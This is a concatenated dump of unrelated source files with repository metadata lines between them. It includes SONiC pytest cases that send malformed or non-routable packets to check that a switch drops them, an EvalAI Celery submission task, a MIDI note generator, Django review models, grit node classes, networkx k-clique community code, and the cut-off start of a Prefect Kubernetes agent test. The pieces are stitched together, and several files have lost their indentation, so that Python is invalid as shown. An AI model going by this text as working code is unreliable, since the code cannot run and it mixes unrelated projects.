def test_dst_ip_is_loopback_addr(do_test, ptfadapter, setup, pkt_fields, tx_dut_ports, ports_info):
"""
    @summary: Create a packet with a loopback destination IP address.
"""
ip_dst = "127.0.0.1"
log_pkt_params(ports_info["dut_iface"], ports_info["dst_mac"], ports_info["src_mac"], ip_dst, pkt_fields["ipv4_src"])
pkt = testutils.simple_tcp_packet(
eth_dst=ports_info["dst_mac"], # DUT port
eth_src=ports_info["src_mac"], # PTF port
ip_src=pkt_fields["ipv4_src"], # PTF source
ip_dst=ip_dst, # VM source
tcp_sport=pkt_fields["tcp_sport"],
tcp_dport=pkt_fields["tcp_dport"])
do_test("L3", pkt, ptfadapter, ports_info, setup["neighbor_sniff_ports"], tx_dut_ports)
def test_src_ip_is_loopback_addr(do_test, ptfadapter, setup, tx_dut_ports, pkt_fields, ports_info):
"""
    @summary: Create a packet with a loopback source IP address.
"""
ip_src = "127.0.0.1"
log_pkt_params(ports_info["dut_iface"], ports_info["dst_mac"], ports_info["src_mac"], pkt_fields["ipv4_dst"], ip_src)
pkt = testutils.simple_tcp_packet(
eth_dst=ports_info["dst_mac"], # DUT port
eth_src=ports_info["src_mac"], # PTF port
ip_src=ip_src, # PTF source
ip_dst=pkt_fields["ipv4_dst"], # VM source
tcp_sport=pkt_fields["tcp_sport"],
tcp_dport=pkt_fields["tcp_dport"])
do_test("L3", pkt, ptfadapter, ports_info, setup["neighbor_sniff_ports"], tx_dut_ports)
def test_dst_ip_absent(do_test, ptfadapter, setup, tx_dut_ports, pkt_fields, ports_info):
"""
    @summary: Create a packet with an absent destination IP address.
"""
log_pkt_params(ports_info["dut_iface"], ports_info["dst_mac"], ports_info["src_mac"], "", pkt_fields["ipv4_src"])
pkt = testutils.simple_tcp_packet(
eth_dst=ports_info["dst_mac"], # DUT port
eth_src=ports_info["src_mac"], # PTF port
ip_src=pkt_fields["ipv4_src"], # PTF source
ip_dst="", # VM source
tcp_sport=pkt_fields["tcp_sport"],
tcp_dport=pkt_fields["tcp_dport"])
do_test("L3", pkt, ptfadapter, ports_info, setup["neighbor_sniff_ports"], tx_dut_ports)
@pytest.mark.parametrize("ip_addr", ["ipv4", "ipv6"])
def test_src_ip_is_multicast_addr(do_test, ptfadapter, setup, tx_dut_ports, pkt_fields, ip_addr, ports_info):
"""
    @summary: Create a packet with a multicast source IP address.
"""
ip_src = None
if ip_addr == "ipv4":
ip_src = "224.0.0.5"
pkt = testutils.simple_tcp_packet(
eth_dst=ports_info["dst_mac"], # DUT port
eth_src=ports_info["src_mac"], # PTF port
ip_src=ip_src,
ip_dst=pkt_fields["ipv4_dst"], # VM source
tcp_sport=pkt_fields["tcp_sport"],
tcp_dport=pkt_fields["tcp_dport"])
elif ip_addr == "ipv6":
if not pkt_fields["ipv6_dst"]:
pytest.skip("BGP neighbour with IPv6 addr was not found")
ip_src = "FF02:AAAA:FEE5::1:3"
pkt = testutils.simple_tcpv6_packet(
eth_dst=ports_info["dst_mac"], # DUT port
eth_src=ports_info["src_mac"], # PTF port
ipv6_src=ip_src,
ipv6_dst=pkt_fields["ipv6_dst"], # VM source
tcp_sport=pkt_fields["tcp_sport"],
tcp_dport=pkt_fields["tcp_dport"])
else:
pytest.fail("Incorrect value specified for 'ip_addr' test parameter. Supported parameters: 'ipv4' and 'ipv6'")
log_pkt_params(ports_info["dut_iface"], ports_info["dst_mac"], ports_info["src_mac"], pkt_fields["ipv4_dst"], ip_src)
do_test("L3", pkt, ptfadapter, ports_info, setup["neighbor_sniff_ports"], tx_dut_ports)
def test_src_ip_is_class_e(do_test, ptfadapter, duthosts, rand_one_dut_hostname, setup, tx_dut_ports, pkt_fields, ports_info):
"""
@summary: Create a packet with source IP address in class E.
"""
duthost = duthosts[rand_one_dut_hostname]
asic_type = duthost.facts["asic_type"]
pytest_require("broadcom" not in asic_type, "BRCM does not drop SIP class E packets")
ip_list = ["240.0.0.1", "255.255.255.254"]
for ip_class_e in ip_list:
log_pkt_params(ports_info["dut_iface"], ports_info["dst_mac"], ports_info["src_mac"], pkt_fields["ipv4_dst"],
ip_class_e)
pkt = testutils.simple_tcp_packet(
eth_dst=ports_info["dst_mac"], # DUT port
eth_src=ports_info["src_mac"], # PTF port
ip_src=ip_class_e,
ip_dst=pkt_fields["ipv4_dst"], # VM source
tcp_sport=pkt_fields["tcp_sport"],
tcp_dport=pkt_fields["tcp_dport"])
do_test("L3", pkt, ptfadapter, ports_info, setup["neighbor_sniff_ports"], tx_dut_ports)
@pytest.mark.parametrize("addr_type, addr_direction", [("ipv4", "src"), ("ipv6", "src"), ("ipv4", "dst"),
("ipv6", "dst")])
def test_ip_is_zero_addr(do_test, ptfadapter, setup, tx_dut_ports, pkt_fields, addr_type, addr_direction, ports_info):
"""
@summary: Create a packet with "0.0.0.0" source or destination IP address.
"""
zero_ipv4 = "0.0.0.0"
zero_ipv6 = "::0"
pkt_params = {
"eth_dst": ports_info["dst_mac"], # DUT port
"eth_src": ports_info["src_mac"], # PTF port
"tcp_sport": pkt_fields["tcp_sport"],
"tcp_dport": pkt_fields["tcp_dport"]
}
if addr_type == "ipv4":
if addr_direction == "src":
pkt_params["ip_src"] = zero_ipv4
pkt_params["ip_dst"] = pkt_fields["ipv4_dst"] # VM source
elif addr_direction == "dst":
pkt_params["ip_src"] = pkt_fields["ipv4_src"] # VM source
pkt_params["ip_dst"] = zero_ipv4
else:
pytest.fail("Incorrect value specified for 'addr_direction'. Supported parameters: 'src' and 'dst'")
pkt = testutils.simple_tcp_packet(**pkt_params)
elif addr_type == "ipv6":
if not pkt_fields["ipv6_dst"]:
pytest.skip("BGP neighbour with IPv6 addr was not found")
if addr_direction == "src":
pkt_params["ipv6_src"] = zero_ipv6
pkt_params["ipv6_dst"] = pkt_fields["ipv6_dst"] # VM source
elif addr_direction == "dst":
pkt_params["ipv6_src"] = pkt_fields["ipv6_src"] # VM source
pkt_params["ipv6_dst"] = zero_ipv6
else:
pytest.fail("Incorrect value specified for 'addr_direction'. Supported parameters: 'src' and 'dst'")
pkt = testutils.simple_tcpv6_packet(**pkt_params)
else:
pytest.fail("Incorrect value specified for 'addr_type' test parameter. Supported parameters: 'ipv4' or 'ipv6'")
logger.info(pkt_params)
do_test("L3", pkt, ptfadapter, ports_info, setup["dut_to_ptf_port_map"].values(), tx_dut_ports)
def test_dst_ip_link_local(do_test, ptfadapter, duthosts, rand_one_dut_hostname, setup, tx_dut_ports, pkt_fields, ports_info):
"""
    @summary: Create a packet with a link-local destination IP address from 169.254.0.0/16.
"""
duthost = duthosts[rand_one_dut_hostname]
asic_type = duthost.facts["asic_type"]
pytest_require("broadcom" not in asic_type, "BRCM does not drop DIP link local packets")
link_local_ip = "169.254.10.125"
pkt_params = {
"eth_dst": ports_info["dst_mac"], # DUT port
"eth_src": ports_info["src_mac"], # PTF port
"tcp_sport": pkt_fields["tcp_sport"],
"tcp_dport": pkt_fields["tcp_dport"]
}
pkt_params["ip_src"] = pkt_fields["ipv4_src"] # VM source
pkt_params["ip_dst"] = link_local_ip
pkt = testutils.simple_tcp_packet(**pkt_params)
logger.info(pkt_params)
do_test("L3", pkt, ptfadapter, ports_info, setup["neighbor_sniff_ports"], tx_dut_ports)
# The test case is skipped because SONiC does not provide a control to adjust loop-back filter settings.
# The default SONiC behaviour is to forward the traffic, so the loop-back filter does not trigger for IP packets.
# All router interfaces have the attribute "sx_interface_attributes_t.loopback_enable" enabled.
# To enable loop-back filter drops, that attribute must be disabled when the RIF is created.
# This could be done via the SAI attribute SAI_ROUTER_INTERFACE_ATTR_LOOPBACK_PACKET_ACTION, which is not exposed to SONiC.
@pytest.mark.skip(reason="SONiC can't enable loop-back filter feature")
def test_loopback_filter(do_test, ptfadapter, setup, tx_dut_ports, pkt_fields, ports_info):
"""
    @summary: Create a packet that is dropped by the loopback filter. The loopback filter drops a packet
              when a route to the host matching the packet's DST IP exists on the receiving interface.
"""
ip_dst = None
vm_name = setup["mg_facts"]["minigraph_neighbors"][ports_info["dut_iface"]]["name"]
for item in setup["mg_facts"]["minigraph_bgp"]:
if item["name"] == vm_name:
ip_dst = item["addr"]
break
if ip_dst is None:
pytest.skip("Testcase is not supported on current interface")
log_pkt_params(ports_info["dut_iface"], ports_info["dst_mac"], ports_info["src_mac"], ip_dst, pkt_fields["ipv4_src"])
pkt = testutils.simple_tcp_packet(
eth_dst=ports_info["dst_mac"], # DUT port
eth_src=ports_info["src_mac"], # PTF port
ip_src=pkt_fields["ipv4_src"], # PTF source
ip_dst=ip_dst,
tcp_sport=pkt_fields["tcp_sport"],
tcp_dport=pkt_fields["tcp_dport"])
do_test("L3", pkt, ptfadapter, ports_info, setup["neighbor_sniff_ports"], tx_dut_ports)
def test_ip_pkt_with_expired_ttl(do_test, ptfadapter, setup, tx_dut_ports, pkt_fields, ports_info):
"""
@summary: Create an IP packet with TTL=0.
"""
log_pkt_params(ports_info["dut_iface"], ports_info["dst_mac"], ports_info["src_mac"], pkt_fields["ipv4_dst"],
pkt_fields["ipv4_src"])
pkt = testutils.simple_tcp_packet(
eth_dst=ports_info["dst_mac"], # DUT port
eth_src=ports_info["src_mac"], # PTF port
ip_src=pkt_fields["ipv4_src"], # PTF source
ip_dst=pkt_fields["ipv4_dst"], # VM IP address
tcp_sport=pkt_fields["tcp_sport"],
tcp_dport=pkt_fields["tcp_dport"],
ip_ttl=0)
do_test("L3", pkt, ptfadapter, ports_info, setup["neighbor_sniff_ports"], tx_dut_ports)
@pytest.mark.parametrize("pkt_field, value", [("version", 1), ("chksum", 10), ("ihl", 1)])
def test_broken_ip_header(do_test, ptfadapter, setup, tx_dut_ports, pkt_fields, pkt_field, value, ports_info):
"""
@summary: Create a packet with broken IP header.
"""
log_pkt_params(ports_info["dut_iface"], ports_info["dst_mac"], ports_info["src_mac"], pkt_fields["ipv4_dst"], pkt_fields["ipv4_src"])
pkt = testutils.simple_tcp_packet(
eth_dst=ports_info["dst_mac"], # DUT port
eth_src=ports_info["src_mac"], # PTF port
ip_src=pkt_fields["ipv4_src"], # PTF source
ip_dst=pkt_fields["ipv4_dst"],
tcp_sport=pkt_fields["tcp_sport"],
tcp_dport=pkt_fields["tcp_dport"]
)
setattr(pkt[testutils.scapy.scapy.all.IP], pkt_field, value)
do_test("L3", pkt, ptfadapter, ports_info, setup["neighbor_sniff_ports"], tx_dut_ports)
def test_absent_ip_header(do_test, ptfadapter, setup, tx_dut_ports, pkt_fields, ports_info):
"""
    @summary: Create a packet with an absent IP header.
"""
log_pkt_params(ports_info["dut_iface"], ports_info["dst_mac"], ports_info["src_mac"], pkt_fields["ipv4_dst"],
pkt_fields["ipv4_src"])
pkt = testutils.simple_tcp_packet(
eth_dst=ports_info["dst_mac"], # DUT port
eth_src=ports_info["src_mac"], # PTF port
ip_src=pkt_fields["ipv4_src"], # PTF source
ip_dst=pkt_fields["ipv4_dst"],
tcp_sport=pkt_fields["tcp_sport"],
tcp_dport=pkt_fields["tcp_dport"]
)
tcp = pkt[testutils.scapy.scapy.all.TCP]
del pkt[testutils.scapy.scapy.all.IP]
pkt.type = 0x800
pkt = pkt/tcp
do_test("L3", pkt, ptfadapter, ports_info, setup["neighbor_sniff_ports"], tx_dut_ports)
@pytest.mark.parametrize("eth_dst", ["01:00:5e:00:01:02", "ff:ff:ff:ff:ff:ff"])
def test_unicast_ip_incorrect_eth_dst(do_test, ptfadapter, setup, tx_dut_ports, pkt_fields, eth_dst, ports_info):
"""
    @summary: Create packets with a multicast/broadcast Ethernet destination MAC.
"""
if "vlan" in tx_dut_ports[ports_info["dut_iface"]].lower():
pytest.skip("Test case is not supported on VLAN interface")
log_pkt_params(ports_info["dut_iface"], eth_dst, ports_info["src_mac"], pkt_fields["ipv4_dst"], pkt_fields["ipv4_src"])
pkt = testutils.simple_tcp_packet(
eth_dst=eth_dst, # DUT port
eth_src=ports_info["src_mac"], # PTF port
ip_src=pkt_fields["ipv4_src"], # PTF source
ip_dst=pkt_fields["ipv4_dst"],
tcp_sport=pkt_fields["tcp_sport"],
tcp_dport=pkt_fields["tcp_dport"]
)
do_test("L3", pkt, ptfadapter, ports_info, setup["neighbor_sniff_ports"], tx_dut_ports)
@pytest.mark.parametrize("igmp_version,msg_type", [("v1", "general_query"), ("v3", "general_query"), ("v1", "membership_report"),
("v2", "membership_report"), ("v3", "membership_report"), ("v2", "leave_group")])
def test_non_routable_igmp_pkts(do_test, ptfadapter, setup, fanouthost, tx_dut_ports, pkt_fields, igmp_version, msg_type, ports_info):
"""
    @summary: Create non-routable IGMP packets.
"""
# IGMP Types:
# 0x11 = Membership Query
# 0x12 = Version 1 Membership Report
# 0x16 = Version 2 Membership Report
# 0x17 = Leave Group
    # IP destination addresses according to RFC 2236:
# Message Type Destination Group
# ------------ -----------------
# General Query ALL-SYSTEMS (224.0.0.1)
# Group-Specific Query The group being queried
# Membership Report The group being reported
# Leave Message ALL-ROUTERS (224.0.0.2)
    # TODO: fix this workaround; the PTF and Scapy versions currently in use do not support creation of IGMPv3 packets.
    # The hex of the IGMPv3 packet layers below was generated temporarily with scapy version 2.4.3.
    # Example of how to get the hex of specific IGMP packets:
# v3_membership_query = IGMPv3(type=0x11, mrcode=0, chksum=None)/scapy.contrib.igmpv3.IGMPv3mq(gaddr="224.0.0.1",
# srcaddrs=["172.16.11.1", "10.0.0.59"], qrv=1, qqic=125, numsrc=2)
# gr_obj = scapy.contrib.igmpv3.IGMPv3gr(rtype=1, auxdlen=0, maddr="224.2.2.4", numsrc=2, srcaddrs=["172.16.11.1",
# "10.0.0.59"]).build()
# v3_membership_report = IGMPv3(type=0x22, mrcode=0, chksum=None)/scapy.contrib.igmpv3.IGMPv3mr(res2=0x00, numgrp=1,
# records=[gr_obj]).build()
# The rest packets are build like "simple_igmp_packet" function from PTF testutils.py
# FIXME: Need some sort of configuration for EOS and SONiC fanout hosts to
# not drop IGMP packets before they reach the DUT
if not fanouthost:
pytest.skip("Test case requires explicit fanout support")
from scapy.contrib.igmp import IGMP
Ether = testutils.scapy.Ether
IP = testutils.scapy.IP
if "vlan" in tx_dut_ports[ports_info["dut_iface"]].lower() and msg_type == "membership_report":
pytest.skip("Test case is not supported on VLAN interface")
igmp_proto = 0x02
multicast_group_addr = "224.1.1.1"
ethernet_dst = "01:00:5e:01:01:01"
ip_dst = {"general_query": "224.0.0.1",
"membership_report": multicast_group_addr}
igmp_types = {"v1": {"general_query": IGMP(type=0x11, gaddr="224.0.0.1"),
"membership_report": IGMP(type=0x12, gaddr=multicast_group_addr)},
"v2": {"membership_report": IGMP(type=0x16, gaddr=multicast_group_addr),
"leave_group": IGMP(type=0x17, gaddr=multicast_group_addr)},
"v3": {"general_query": "\x11\x00L2\xe0\x00\x00\x01\x01}\x00\x02\xac\x10\x0b\x01\n\x00\x00;",
"membership_report": "\"\x009\xa9\x00\x00\x00\x01\x01\x00\x00\x02\xe0\x02\x02\x04\xac\x10\x0b\x01\n\x00\x00;"}
}
if igmp_version == "v3":
pkt = testutils.simple_ip_packet(
eth_dst=ethernet_dst,
eth_src=ports_info["src_mac"],
ip_src=pkt_fields["ipv4_src"],
ip_dst=ip_dst[msg_type],
ip_ttl=1,
ip_proto=igmp_proto
)
del pkt["Raw"]
pkt = pkt / igmp_types[igmp_version][msg_type]
else:
eth_layer = Ether(src=ports_info["src_mac"], dst=ethernet_dst)
        ip_layer = IP(src=pkt_fields["ipv4_src"])
igmp_layer = igmp_types[igmp_version][msg_type]
assert igmp_layer.igmpize(ip=ip_layer, ether=eth_layer), "Can't create IGMP packet"
pkt = eth_layer/ip_layer/igmp_layer
log_pkt_params(ports_info["dut_iface"], ethernet_dst, ports_info["src_mac"], pkt.getlayer("IP").dst, pkt_fields["ipv4_src"])
do_test("L3", pkt, ptfadapter, ports_info, setup["dut_to_ptf_port_map"].values(), tx_dut_ports)
| 42.143432
| 153
| 0.675562
|
f57fd4d23f427b0686cd4356a8f760d438e20f33
| 2,824
|
py
|
Python
|
apps/jobs/tasks.py
|
apoorvkhare07/EvalAI
|
7961addc9e6717ce962ea74e275b6d1070f6a601
|
[
"BSD-3-Clause"
] | 1
|
2019-11-08T05:23:11.000Z
|
2019-11-08T05:23:11.000Z
|
apps/jobs/tasks.py
|
apoorvkhare07/EvalAI
|
7961addc9e6717ce962ea74e275b6d1070f6a601
|
[
"BSD-3-Clause"
] | 1
|
2021-05-05T00:33:23.000Z
|
2021-05-05T00:33:23.000Z
|
apps/jobs/tasks.py
|
apoorvkhare07/EvalAI
|
7961addc9e6717ce962ea74e275b6d1070f6a601
|
[
"BSD-3-Clause"
] | 1
|
2020-10-03T04:37:58.000Z
|
2020-10-03T04:37:58.000Z
|
import logging
import os
import shutil
from challenges.models import ChallengePhase
from django.contrib.auth.models import User
from django.core.files.uploadedfile import SimpleUploadedFile
from django.http import HttpRequest
from evalai.celery import app
from participants.models import ParticipantTeam
from participants.utils import (
get_participant_team_id_of_user_for_a_challenge
)
from .models import Submission
from .serializers import SubmissionSerializer
from .utils import get_file_from_url
from .sender import publish_submission_message
logger = logging.getLogger(__name__)
@app.task
def download_file_and_publish_submission_message(
request_data,
user_pk,
request_method,
challenge_phase_id
):
"""
    Download the submission file from a URL and send it for evaluation
"""
user = User.objects.get(pk=user_pk)
challenge_phase = ChallengePhase.objects.get(
pk=challenge_phase_id
)
participant_team_id = get_participant_team_id_of_user_for_a_challenge(
user, challenge_phase.challenge.pk
)
participant_team = ParticipantTeam.objects.get(
pk=participant_team_id
)
request = HttpRequest()
request.method = request_method
request.user = user
try:
downloaded_file = get_file_from_url(request_data["file_url"])
file_path = os.path.join(downloaded_file["temp_dir_path"], downloaded_file["name"])
with open(file_path, 'rb') as f:
input_file = SimpleUploadedFile(
downloaded_file["name"],
f.read(),
content_type="multipart/form-data"
)
data = {
"input_file": input_file,
"method_name": request_data["method_name"],
"method_description": request_data["method_description"],
"project_url": request_data["project_url"],
"publication_url": request_data["publication_url"],
"status": Submission.SUBMITTED
}
serializer = SubmissionSerializer(
data=data,
context={
'participant_team': participant_team,
'challenge_phase': challenge_phase,
'request': request
}
)
if serializer.is_valid():
serializer.save()
submission = serializer.instance
# publish messages in the submission worker queue
publish_submission_message(challenge_phase.challenge.pk, challenge_phase.pk, submission.pk)
logger.info("Message published to submission worker successfully!")
shutil.rmtree(downloaded_file['temp_dir_path'])
except Exception as e:
logger.exception(
"Exception while downloading and sending submission for evaluation {}"
.format(e)
)
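# Minimal usage sketch (illustrative only, values are hypothetical): the task would typically be queued
# asynchronously with Celery's standard delay() API, e.g. from a view handling a URL-based submission:
#
#     download_file_and_publish_submission_message.delay(
#         request_data={
#             "file_url": "https://example.com/submission.zip",
#             "method_name": "baseline",
#             "method_description": "",
#             "project_url": "",
#             "publication_url": "",
#         },
#         user_pk=request.user.pk,
#         request_method="POST",
#         challenge_phase_id=challenge_phase.pk,
#     )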
| 33.619048
| 103
| 0.673513
|
20900e0c2f5ec60ccb5701eaaa4e78fecbd6d50d
| 1,314
|
py
|
Python
|
CrittersProto/generator/uplift.py
|
nickjbenson/Kami
|
2c9614f66055bea02f660f41c3aa5a00083331b8
|
[
"MIT"
] | 1
|
2018-02-26T13:51:23.000Z
|
2018-02-26T13:51:23.000Z
|
CrittersProto/generator/uplift.py
|
nickjbenson/Kami
|
2c9614f66055bea02f660f41c3aa5a00083331b8
|
[
"MIT"
] | null | null | null |
CrittersProto/generator/uplift.py
|
nickjbenson/Kami
|
2c9614f66055bea02f660f41c3aa5a00083331b8
|
[
"MIT"
] | null | null | null |
##################################################################
#
# benchan
#
# MIT License (http://opensource.org/licenses/MIT)
#
##################################################################
from baseGenerator import BaseGenerator
import random
NOTES_PER_BEAT = 1
kPitches = (60, 64, 67, 72,76,79,84, 88, 65, 60, 65)
class Uplift(BaseGenerator):
def __init__(self, seed):
BaseGenerator.__init__(self, seed, synthName="../JR_vibra.sf2")
# Notes
self.notes = choose_notes()
self.note_velocity = 60
self.set_cpb(0, 0, 0)
self.set_num_notes_per_beat(NOTES_PER_BEAT)
def get_notes_list(self):
return self.notes
def get_note_velocity(self):
return self.note_velocity
def choose_notes():
notesList = []
probSustain = 0.9
probNoteOn = 0.2
noteOn = False
# 16 beats
for note in xrange(0, 16):
        if not noteOn and random.random() < probNoteOn:
            randIndex = random.randint(0, len(kPitches) - 2)
            notesList.append([kPitches[randIndex], kPitches[randIndex + 1]])
            # A note pair has started; remember it so the sustain branch below can fire.
            noteOn = True
            probSustain = 0.7
        elif noteOn and random.random() < probSustain:
            # Sustain the currently playing notes, with a halving probability each beat.
            notesList.append(0)
            probSustain /= 2
        else:
            # Rest, releasing any currently playing notes.
            notesList.append(-1)
            noteOn = False
return notesList
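# Illustrative example of the returned structure (hypothetical random draw):
#     choose_notes() -> [[60, 64], 0, -1, -1, [79, 84], 0, 0, -1, ...]   # 16 entries, one per beat
# A [pitch, pitch] pair presumably starts a two-note figure taken from kPitches, 0 sustains the
# current notes and -1 marks a rest; the exact interpretation is up to BaseGenerator, which consumes
# the list via get_notes_list().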
| 24.792453
| 76
| 0.555556
|
831cc43188b2ee63669214ececf71ad7cd45f674
| 2,791
|
py
|
Python
|
api_v1/models.py
|
Fastex007/api_yamdb
|
93fd2054111b86d392f5d5769dbe125c16b06126
|
[
"BSD-3-Clause"
] | null | null | null |
api_v1/models.py
|
Fastex007/api_yamdb
|
93fd2054111b86d392f5d5769dbe125c16b06126
|
[
"BSD-3-Clause"
] | null | null | null |
api_v1/models.py
|
Fastex007/api_yamdb
|
93fd2054111b86d392f5d5769dbe125c16b06126
|
[
"BSD-3-Clause"
] | null | null | null |
from django.db import models
from django.contrib.auth import get_user_model
from .validators import date_validator
from django.core.validators import MinValueValidator, MaxValueValidator
User = get_user_model()
class Genres(models.Model):
name = models.CharField(verbose_name='Название жанра', max_length=200)
slug = models.SlugField(verbose_name='Слаг', unique=True)
def __str__(self):
return self.name
class Categories(models.Model):
name = models.CharField(verbose_name='Имя категории', max_length=200)
slug = models.SlugField(verbose_name='Слаг', unique=True)
def __str__(self):
return self.name
class Title(models.Model):
name = models.CharField(
verbose_name='Название произведения',
max_length=300
)
year = models.PositiveSmallIntegerField(
verbose_name='Год выхода произведения',
null=True,
blank=True,
validators=[date_validator]
)
description = models.CharField(
verbose_name='Описание',
max_length=1000,
blank=True
)
category = models.ForeignKey(
Categories,
verbose_name='Категория произведения',
on_delete=models.SET_NULL,
null=True,
blank=True
)
genre = models.ManyToManyField(Genres, verbose_name='Жанр произведения')
def __str__(self):
return self.name
class Review(models.Model):
title_id = models.ForeignKey(
Title,
verbose_name='ID произведения',
on_delete=models.CASCADE,
related_name='review'
)
text = models.TextField(verbose_name='Текст отзыва', max_length=1000)
author = models.ForeignKey(
User,
verbose_name='Автор отзыва',
on_delete=models.CASCADE,
related_name='review'
)
score = models.IntegerField(
default=None,
verbose_name='Рейтинг от 1 до 10',
validators=[MaxValueValidator(10),
MinValueValidator(1)])
pub_date = models.DateTimeField(
verbose_name='Дата публикации',
auto_now_add=True
)
    def __str__(self):
        # __str__ must return a string; title_id is a Title instance, so convert it explicitly.
        return str(self.title_id)
class Comment(models.Model):
review = models.ForeignKey(
Review, verbose_name='Отзыв',
on_delete=models.CASCADE,
related_name='comments'
)
author = models.ForeignKey(
User, verbose_name='Автор комментария',
on_delete=models.CASCADE,
related_name='comments'
)
text = models.TextField(verbose_name='Текст комментария')
pub_date = models.DateTimeField(verbose_name='Дата добавления',
auto_now_add=True,
db_index=True
)
class Meta:
ordering = ['-pub_date']
| 27.097087
| 76
| 0.635973
|
cfff7a46d5477eb4e278e7191fed6a8932cfd462
| 2,073
|
py
|
Python
|
tools/grit/grit/node/empty.py
|
rwatson/chromium-capsicum
|
b03da8e897f897c6ad2cda03ceda217b760fd528
|
[
"BSD-3-Clause"
] | 11
|
2015-03-20T04:08:08.000Z
|
2021-11-15T15:51:36.000Z
|
tools/grit/grit/node/empty.py
|
rwatson/chromium-capsicum
|
b03da8e897f897c6ad2cda03ceda217b760fd528
|
[
"BSD-3-Clause"
] | null | null | null |
tools/grit/grit/node/empty.py
|
rwatson/chromium-capsicum
|
b03da8e897f897c6ad2cda03ceda217b760fd528
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/python2.4
# Copyright (c) 2006-2008 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''Container nodes that don't have any logic.
'''
from grit.node import base
from grit.node import include
from grit.node import structure
from grit.node import message
from grit.node import io
from grit.node import misc
class GroupingNode(base.Node):
'''Base class for all the grouping elements (<structures>, <includes>,
<messages> and <identifiers>).'''
def DefaultAttributes(self):
return {
'first_id' : '',
'comment' : '',
'fallback_to_english' : 'false',
}
class IncludesNode(GroupingNode):
'''The <includes> element.'''
def _IsValidChild(self, child):
return isinstance(child, (include.IncludeNode, misc.IfNode))
class MessagesNode(GroupingNode):
'''The <messages> element.'''
def _IsValidChild(self, child):
return isinstance(child, (message.MessageNode, misc.IfNode))
def ItemFormatter(self, t):
'''Return the stringtable itemformatter if an RC is being formatted.'''
if t in ['rc_all', 'rc_translateable', 'rc_nontranslateable']:
from grit.format import rc # avoid circular dep by importing here
return rc.StringTable()
elif t == 'js_map_format':
from grit.format import js_map_format
return js_map_format.StringTable()
class StructuresNode(GroupingNode):
'''The <structures> element.'''
def _IsValidChild(self, child):
return isinstance(child, (structure.StructureNode, misc.IfNode))
class TranslationsNode(base.Node):
'''The <translations> element.'''
def _IsValidChild(self, child):
return isinstance(child, io.FileNode)
class OutputsNode(base.Node):
'''The <outputs> element.'''
def _IsValidChild(self, child):
return isinstance(child, io.OutputNode)
class IdentifiersNode(GroupingNode):
'''The <identifiers> element.'''
def _IsValidChild(self, child):
from grit.node import misc
return isinstance(child, misc.IdentifierNode)
| 28.39726
| 75
| 0.712976
|
e1dc8058b6e0152593649500126a2c7d88432e24
| 2,483
|
py
|
Python
|
networkx/algorithms/community/kclique.py
|
bforte/networkx
|
a8c09757f52c2d690d0c8cd983e55a2af9b8d260
|
[
"BSD-3-Clause"
] | 1
|
2019-12-03T14:58:04.000Z
|
2019-12-03T14:58:04.000Z
|
networkx/algorithms/community/kclique.py
|
bforte/networkx
|
a8c09757f52c2d690d0c8cd983e55a2af9b8d260
|
[
"BSD-3-Clause"
] | 1
|
2019-12-19T16:49:00.000Z
|
2019-12-20T06:22:46.000Z
|
networkx/algorithms/community/kclique.py
|
bforte/networkx
|
a8c09757f52c2d690d0c8cd983e55a2af9b8d260
|
[
"BSD-3-Clause"
] | 2
|
2020-02-13T10:33:34.000Z
|
2020-08-09T07:59:26.000Z
|
from collections import defaultdict
import networkx as nx
__all__ = ['k_clique_communities']
def k_clique_communities(G, k, cliques=None):
"""Find k-clique communities in graph using the percolation method.
A k-clique community is the union of all cliques of size k that
can be reached through adjacent (sharing k-1 nodes) k-cliques.
Parameters
----------
G : NetworkX graph
k : int
Size of smallest clique
cliques: list or generator
Precomputed cliques (use networkx.find_cliques(G))
Returns
-------
Yields sets of nodes, one for each k-clique community.
Examples
--------
>>> from networkx.algorithms.community import k_clique_communities
>>> G = nx.complete_graph(5)
>>> K5 = nx.convert_node_labels_to_integers(G,first_label=2)
>>> G.add_edges_from(K5.edges())
>>> c = list(k_clique_communities(G, 4))
>>> sorted(list(c[0]))
[0, 1, 2, 3, 4, 5, 6]
>>> list(k_clique_communities(G, 6))
[]
References
----------
    .. [1] Gergely Palla, Imre Derényi, Illés Farkas, and Tamás Vicsek,
       Uncovering the overlapping community structure of complex networks
       in nature and society. Nature 435, 814-818, 2005,
       doi:10.1038/nature03607
"""
if k < 2:
raise nx.NetworkXError("k=%d, k must be greater than 1." % k)
if cliques is None:
cliques = nx.find_cliques(G)
cliques = [frozenset(c) for c in cliques if len(c) >= k]
# First index which nodes are in which cliques
membership_dict = defaultdict(list)
for clique in cliques:
for node in clique:
membership_dict[node].append(clique)
# For each clique, see which adjacent cliques percolate
perc_graph = nx.Graph()
perc_graph.add_nodes_from(cliques)
for clique in cliques:
for adj_clique in _get_adjacent_cliques(clique, membership_dict):
if len(clique.intersection(adj_clique)) >= (k - 1):
perc_graph.add_edge(clique, adj_clique)
# Connected components of clique graph with perc edges
# are the percolated cliques
for component in nx.connected_components(perc_graph):
        yield frozenset.union(*component)
def _get_adjacent_cliques(clique, membership_dict):
adjacent_cliques = set()
for n in clique:
for adj_clique in membership_dict[n]:
if clique != adj_clique:
adjacent_cliques.add(adj_clique)
return adjacent_cliques
| 31.43038
| 73
| 0.658478
|
7fef2104499d6eea5138ec29d79b2f8b587625ed
| 52,423
|
py
|
Python
|
tests/agent/test_k8s_agent.py
|
maxkferg/prefect
|
742153b6ebeb46e2f2f598ef54c28a9a53c2c271
|
[
"Apache-2.0"
] | null | null | null |
tests/agent/test_k8s_agent.py
|
maxkferg/prefect
|
742153b6ebeb46e2f2f598ef54c28a9a53c2c271
|
[
"Apache-2.0"
] | null | null | null |
tests/agent/test_k8s_agent.py
|
maxkferg/prefect
|
742153b6ebeb46e2f2f598ef54c28a9a53c2c271
|
[
"Apache-2.0"
] | null | null | null |
import json
from unittest.mock import MagicMock
import pendulum
import pytest
pytest.importorskip("kubernetes")
import yaml
import prefect
from prefect.agent.kubernetes.agent import KubernetesAgent, read_bytes_from_path
from prefect.environments import LocalEnvironment
from prefect.storage import Docker, Local
from prefect.run_configs import KubernetesRun, LocalRun, UniversalRun
from prefect.utilities.configuration import set_temporary_config
from prefect.utilities.exceptions import ClientError
from prefect.utilities.graphql import GraphQLResult
@pytest.fixture(autouse=True)
def mocked_k8s_config(monkeypatch):
k8s_config = MagicMock()
monkeypatch.setattr("kubernetes.config", k8s_config)
def test_k8s_agent_init(monkeypatch, cloud_api):
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
